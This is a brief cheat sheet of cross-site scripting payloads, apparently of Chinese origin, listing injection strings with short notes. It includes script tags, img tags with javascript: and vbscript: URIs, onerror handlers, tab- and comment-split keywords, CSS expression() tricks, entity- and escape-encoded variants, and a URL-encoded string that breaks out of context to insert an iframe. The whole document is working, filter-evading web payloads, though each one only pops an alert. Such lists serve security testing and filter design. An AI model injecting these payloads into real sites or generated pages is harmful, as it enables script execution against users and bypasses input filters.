<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)"></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the ? characters stand for whitespace entered with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["